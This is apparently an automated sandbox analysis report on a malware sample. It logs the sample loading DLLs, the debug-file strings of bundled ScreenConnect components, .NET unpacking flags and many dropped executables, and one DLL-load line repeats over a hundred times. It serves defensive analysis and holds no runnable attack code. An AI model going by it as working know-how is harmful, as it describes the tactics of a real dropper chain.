                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: RPHbzz3JqY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: RPHbzz3JqY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbQ source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdb\888 source: gtxkvh.exe, 0000001A.00000000.2318421372.0000000000F16000.00000002.00000001.01000000.0000001A.sdmp, sys_updater.exe.26.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdba444 source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2181196365.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1A4E000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000001333000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdb source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2181196365.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, gtxkvh.exe, 0000001A.00000000.2318421372.0000000000F16000.00000002.00000001.01000000.0000001A.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1A4E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe.26.dr
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765388951.0000000000F2D000.00000002.00000001.01000000.00000008.sdmp, ix4A2DreBBsQwY6YHkidcDjo.exe, 00000012.00000000.1903447365.0000000000FCD000.00000002.00000001.01000000.00000012.sdmp, YAPNXRPmcarcR4ZDgC81Tbdk.exe, 00000013.00000000.1966000603.000000000024D000.00000002.00000001.01000000.00000013.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000014.00000000.2028047270.00000000002ED000.00000002.00000001.01000000.00000014.sdmp, 3HvoFOAmEaJswFCHOzyfyz5b.exe, 00000015.00000000.2102895090.0000000000EBD000.00000002.00000001.01000000.00000015.sdmp, 6KZmcK8r6beUzmRf6Ci6nx8d.exe, 00000016.00000000.2167482839.000000000091D000.00000002.00000001.01000000.00000016.sdmp, yDd3OJXsNQptgFrYILoygXLs.exe, 00000017.00000000.2231749071.0000000000EFD000.00000002.00000001.01000000.00000017.sdmp, xpTljBOh8s4KWiGtXsL1c00g.exe, 00000019.00000000.2295830605.00000000008DD000.00000002.00000001.01000000.00000019.sdmp, oZolmRBaYFkuutSgcOrBLSAQ.exe, 0000001E.00000000.2373071915.000000000067D000.00000002.00000001.01000000.0000001B.sdmp, V6uPDVniSnRMWuLn5U9T3TGJ.exe, 00000020.00000000.2460409209.000000000018D000.00000002.00000001.01000000.0000001C.sdmp, 2TUSzbAUfKRfcjcMzfoV1qdi.exe, 00000023.00000000.2556332589.000000000009D000.00000002.00000001.01000000.0000001D.sdmp, ixjnzi95HfqR77bieLYCT4aJ.exe, 00000024.00000000.2651179810.000000000002D000.00000002.00000001.01000000.0000001E.sdmp, 6pkNzPZrIkyPzGNsokLQ8aZR.exe, 00000025.00000000.2754908254.0000000000E7D000.00000002.00000001.01000000.0000001F.sdmp, hQdOgl4rhYQYx3G5aYY61LEd.exe, 00000026.00000000.2881740586.000000000063D000.00000002.00000001.01000000.00000020.sdmp, oZolmRBaYFkuutSgcOrBLSAQ.exe.4.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.dr, -Module-.cs.Net Code: _202D_202C_202E_206E_202B_206C_206E_206C_200D_202A_200B_206D_202E_202E_206D_202C_206C_202D_202C_202A_202E_206A_206E_202E_202B_202D_202D_200B_206E_202D_206F_202E_202A_206B_202C_200C_206C_202B_200B_206B_202E System.Reflection.Assembly.Load(byte[])
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.146ecf4.5.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: RPHbzz3JqY.exeStatic PE information: real checksum: 0x0 should be: 0x5978a
                            Source: explert.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x5978a
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x12e0ec
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.drStatic PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xb070f
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe.4.drStatic PE information: section name: _RDATA
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F1154 push ecx; ret 0_2_005F1167
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00551154 push ecx; ret 3_2_00551167
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C793804 push ecx; ret 10_2_6C793817
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B2155 pushfd ; retf 10_2_017B215B
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B1E8B push 8BD08B01h; retf 10_2_017B1E92
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_06F5B45A push es; ret 12_2_06F5B4C4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_06F5B420 push es; ret 12_2_06F5B4C4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_06F5B520 push es; ret 12_2_06F5B4C4
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.drStatic PE information: section name: .text entropy: 6.934918450957892
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\Users\user\AppData\Roaming\S11E1iMt\caXZVqEB\FssOp8yZ\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeJump to dropped file
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeFile created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeFile created: C:\Users\user\AppData\Roaming\7XRpz47Z\MWQSQZoG\LJi5CxaZ\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeFile created: C:\Users\user\AppData\Roaming\Cth3XJqK\Us7ocUFg\nChXmDXJ\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exeJump to dropped file
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\Users\user\AppData\Roaming\SgJvWIOT\k0mHyoU4\FomDFzEQ\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeFile created: C:\Users\user\AppData\Roaming\3TywDL8i\9iCHA8GK\9QRXpsuI\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exeJump to dropped file
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeFile created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exeJump to dropped file
